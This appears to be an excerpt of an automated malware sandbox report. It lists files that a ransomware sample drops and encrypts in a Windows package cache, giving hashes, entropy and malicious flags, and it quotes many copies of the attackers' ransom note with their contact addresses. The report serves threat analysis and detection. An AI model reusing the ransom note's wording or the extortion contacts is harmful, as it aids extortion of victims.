                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.9942709163809145
                  Encrypted:true
                  SSDEEP:3072:ZouiRWArlw73IytiQU1aGF+tx6wjOTlSA2O+cwGDgXoJ6UYJ:ZNAG73IwiQMYtxuAH575oJoJ
                  MD5:B1631A74AA677E5343BC0C792AF5C6DE
                  SHA1:97861ACA0B71E4B82E204928DB50B1C3DCF0F225
                  SHA-256:819832CCAE5869711E7F762D0C815834971DF6BB6073657CAE7C17D5759CA510
                  SHA-512:0F61F551547F5DCA15C155F3EC58AE0C7ACA277D770F197223EA474ADF0D684318E3FEE3ED91B83117295EEBEBF2685FF4F43C2E4129FA864F9E30B5ABAC3DB1
                  Malicious:true
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):821248
                  Entropy (8bit):7.999644429375621
                  Encrypted:true
                  SSDEEP:24576:SAoGQn5dyWmgow7uNWDhVFbmME8VhE7XLgKex:SAo95/ow72o/jE867Xex
                  MD5:16194BA7F62D0275766412C40FB1C94E
                  SHA1:28FA72E4CC481B4A99ABF62AF912E135A0550D8D
                  SHA-256:0CED1B51B496A555FBD4A1C1FF8152CBED25774637708316C68C613538A1F176
                  SHA-512:AFE83058E93B73908B18D9169659FAFE777325CD88DD2B68C132678FC4AA020A80F9220C921CC4037A3027F965F64951C43B5705C9B49482B9ABE36A867DE42B
                  Malicious:true
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.993741808928614
                  Encrypted:true
                  SSDEEP:3072:MgoQyHi6LlIRPRc8dXT6t93/tnUS1lhtkIILDC4aCora:vt+RIhRcmS5BUS1lhtQma
                  MD5:93A1E9DECF27A3B3840BC187FB8B384E
                  SHA1:A3A3A74EF5CFC24423D776793FDBDD18DC6A98B5
                  SHA-256:223A3C803D85BC3D83FC402F5B62D4F0EB8AA7D35BDE0F74B7FE86A3CAD919F9
                  SHA-512:87D6FD85A93D0EF8106887D45931FB3DB264A77DA095E4282FBD558C4A9851EA12EE5E9352F54E9A965C84758226496D4A5897409BDB1190F71AEC253BA479B4
                  Malicious:true
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):718848
                  Entropy (8bit):7.999585886967448
                  Encrypted:true
                  SSDEEP:12288:d7+7mCO2F2jURkoPr7YDhv2eTxEGZxT6lziwCBi1X8/34a8:5gge7YFeelHZR6lWq8/34B
                  MD5:24B1007B6BE66BF58E21DECD09D1277B
                  SHA1:9B4D7B819870F589BB24A8CCB7A357A70B88AD9A
                  SHA-256:66FBAC4C0F4AC2A0C8904A9CDB6F093AAAA46379FB6F842546B2B330A7585F14
                  SHA-512:0734A1880085D743E4FBD346FAC92E8740B906D691127EF1A0A649A31AF2BA51276D8D320F64D04B5A40E9298B9D3FE00B9AA0F901E6CED69255465FEACF120E
                  Malicious:true
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994420189842325
                  Encrypted:true
                  SSDEEP:3072:aMWFHk5mv+ZTPDINyx5hBT8tJvzxny4ZG848w+:a/kYvSANyOtJZE8K+
                  MD5:79A65DF20DDD102FABEBA6FAF1DC617A
                  SHA1:2DD05CB4B5FAE5A0FFD23071F4E8BE200DC410F2
                  SHA-256:798B94BDD281083FD17B3140449A4FC7F3F395869A88B8ABB78CB65966D619EB
                  SHA-512:48EEF57D3BE8EFC4828009EC26EE2CD9187D9BD2C2A51F0ACBD5BFE41C6FD4DBDF241784CFAADBF5787E5377A9C66DED1DA4C90C18CB8A1720F4F396A8F84C47
                  Malicious:true
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1538048
                  Entropy (8bit):7.999840677401594
                  Encrypted:true
                  SSDEEP:24576:oEbEDG3T29p8YkR5S4pt0O3dmZSfsb3dshUqeNiBGwG4PRoR77VF4tMViIlTO1/G:N68vS9OQ1p2iNi13pOr4tKix1J0
                  MD5:C70A4AEF5DEB5B52DD3CC756792FD7D8
                  SHA1:6D165F5417260432B8FE38609C00A10680B489EC
                  SHA-256:8CB42889818C89663972228726AD283439A36D893E1506F66BCCE063C0FBE7CF
                  SHA-512:0A5EF0CABF7AF06CE75E2FA51181567A49162B8D7634BEB2397C12712CE2B8012FC70763E00876518E8071AC92BC06B77DC4BEDA296ECBC0C8BDA0A11D81CE7C
                  Malicious:true
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994294986891483
                  Encrypted:true
                  SSDEEP:1536:q7XfowBkglGkthmY/7HGXeGd0OGp4yRHKJ7MBB1aPusowLTrQ6ApZzDfgl4E7mLq:Bejthl/7Heg4yoVQvuaSQ6A3gygWdk
                  MD5:F17970477C69FB646B44750443343499
                  SHA1:E138B4FA375E3B1F71B4054159DA65BAFD2E1396
                  SHA-256:8C72140DE207C7A0FD528C9E8446C08C620B341DD11C319BCBB2F7652A464481
                  SHA-512:31152F82D2539E8B72C249CBCFA6CBF4EA520D98C7701FBAA2B7E80D683297DD9665852426E750D0AEFF02C5081DE78640A208CAB9E4DA7D7DCADD1D90FCC75F
                  Malicious:true
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4917248
                  Entropy (8bit):7.999956506001408
                  Encrypted:true
                  SSDEEP:98304:gy1Pi9K5t2rx+r7m6Kkg+ytyiO6jQq5lLrIGN2w/3OhiiaXzvzzE3:BP3t2N+r7RKkgyiO6V5lvIGkkO4Bvzzq
                  MD5:59D3237A7A9669B03DAA9B289BF7BFCB
                  SHA1:F1E68D871F8CF1EB84AA954EC28018399441374B
                  SHA-256:18A62D16791B7C69182204C8E3E5BB6C6DE0EB37EAE6B467629F48895BD58160
                  SHA-512:29B9DC1125A9A268F2D6083A7A03860E3C4CEB7B33CF8D92D45C38957E6A8E402926D0456BC1297B84E574868FBF568D5444432C637F93D24E251C123AAFD7AD
                  Malicious:true
                  C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.9949495484957644
                  Encrypted:true
                  SSDEEP:1536:wUSuMbzx+vkUupJ82ralJCydiYNLV7U4bprcPB3u2PfsOeNZ701MG0vIxGGjCL:yuMbzgMUI/ra/CHKLV424XeNE0vIxGgg
                  MD5:161E67FAD7475BA36575AD2D29D1F4D6
                  SHA1:ED63DF74D01DE2B70E0C8ACC3A905BC91B896CAE
                  SHA-256:25BA4E4C12159460BC85093E9F6BF5BD1E897DB2D2581CFE007B522FD8003E58
                  SHA-512:13C8854E9985001DDF83CDD1ACB7567DCDBA69714D633C0B8F39DEA2BEAFC08287FFC3E2883B88890E4C202F66D9FDEB75BBD1A90DF95F718D8E0B6F2F61CC05
                  Malicious:true
                  C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.067291748349717
